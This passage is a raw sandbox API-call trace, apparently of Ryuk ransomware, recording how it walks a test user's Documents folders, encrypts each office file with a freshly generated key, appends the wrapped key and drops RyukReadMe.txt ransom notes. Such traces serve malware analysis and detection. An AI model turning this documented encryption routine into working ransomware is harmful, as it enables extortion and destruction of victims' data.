hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0155.914] SetLastError (dwErrCode=0x0) [0155.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\styGr-eWlvKp4M\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\stygr-ewlvkp4m\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.916] GetLastError () returned 0x0 [0155.916] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0155.916] CloseHandle (hObject=0x188) returned 1 [0155.917] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.917] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wFpEG.xlsx", dwFileAttributes=0x80) returned 1 [0155.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wFpEG.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wfpeg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.917] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=87023) returned 1 [0155.917] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=87023) returned 1 [0155.917] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x152cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.917] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.918] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.918] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.918] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.918] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.918] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x153ef, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x153ef, lpOverlapped=0x0) returned 1 [0155.920] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.920] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x153ef, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x153f0) returned 1 [0155.920] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.920] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x153f0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x153f0, lpOverlapped=0x0) returned 1 [0155.921] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.921] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.921] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.921] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.921] CloseHandle (hObject=0x188) returned 1 [0155.937] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.941] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.941] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.942] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.942] SetLastError (dwErrCode=0x0) [0155.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.942] GetLastError () returned 0xb7 [0155.942] CloseHandle (hObject=0x188) returned 1 [0155.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yQkFHZ\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0155.942] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.942] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.942] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yQkFHZ\\ElvMMTw.csv", dwFileAttributes=0x80) returned 1 [0155.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yQkFHZ\\ElvMMTw.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqkfhz\\elvmmtw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.943] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=87314) returned 1 [0155.943] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=87314) returned 1 [0155.943] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x153f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.943] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.944] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.944] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.944] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.944] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.944] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x15512, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x15512, lpOverlapped=0x0) returned 1 [0155.946] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.946] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x15512, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x15520) returned 1 [0155.946] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.946] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15520, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x15520, lpOverlapped=0x0) returned 1 [0155.946] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.946] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.947] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.947] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.947] CloseHandle (hObject=0x18c) returned 1 [0155.962] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.967] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.967] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.968] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.968] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yQkFHZ\\xcdhTjHz.odp", dwFileAttributes=0x80) returned 1 [0155.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yQkFHZ\\xcdhTjHz.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqkfhz\\xcdhtjhz.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.968] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=30075) returned 1 [0155.968] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=30075) returned 1 [0155.968] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x7459, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.969] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.969] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.969] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.969] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.969] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.969] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x757b, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x757b, lpOverlapped=0x0) returned 1 [0155.970] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.970] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x757b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x7580) returned 1 [0155.970] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.970] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7580, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x7580, lpOverlapped=0x0) returned 1 [0155.970] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.970] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.971] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.971] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.971] CloseHandle (hObject=0x18c) returned 1 [0156.001] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.011] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.011] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.011] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0156.011] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0156.011] SetLastError (dwErrCode=0x0) [0156.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yQkFHZ\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqkfhz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.011] GetLastError () returned 0x0 [0156.011] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.012] CloseHandle (hObject=0x188) returned 1 [0156.012] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.012] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.013] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqvYXt9RFCn.docx", dwFileAttributes=0x80) returned 1 [0156.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqvYXt9RFCn.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqvyxt9rfcn.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.013] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=61108) returned 1 [0156.013] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=61108) returned 1 [0156.013] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xed92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.013] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0156.014] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.014] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0156.014] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.014] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.014] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xeeb4, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xeeb4, lpOverlapped=0x0) returned 1 [0156.015] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0156.015] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xeeb4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xeec0) returned 1 [0156.016] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.016] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xeec0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xeec0, lpOverlapped=0x0) returned 1 [0156.016] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0156.016] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0156.016] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0156.016] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0156.016] CloseHandle (hObject=0x188) returned 1 [0156.032] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.037] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.037] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.037] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.037] SetLastError (dwErrCode=0x0) [0156.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.037] GetLastError () returned 0xb7 [0156.037] CloseHandle (hObject=0x188) returned 1 [0156.037] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZX6D\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0156.038] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.038] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.038] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.038] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZX6D\\T3emAeuMu LaQVy_.doc", dwFileAttributes=0x80) returned 1 [0156.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZX6D\\T3emAeuMu LaQVy_.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zx6d\\t3emaeumu laqvy_.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.038] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=69362) returned 1 [0156.038] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=69362) returned 1 [0156.038] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x10dd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.038] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0156.039] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.039] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.039] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.039] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.039] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10ef2, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x10ef2, lpOverlapped=0x0) returned 1 [0156.041] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.041] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10ef2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10f00) returned 1 [0156.042] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.042] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10f00, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10f00, lpOverlapped=0x0) returned 1 [0156.042] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.042] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.042] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.042] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.042] CloseHandle (hObject=0x18c) returned 1 [0156.058] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.063] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.063] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.063] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0156.063] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0156.064] SetLastError (dwErrCode=0x0) [0156.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZX6D\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js 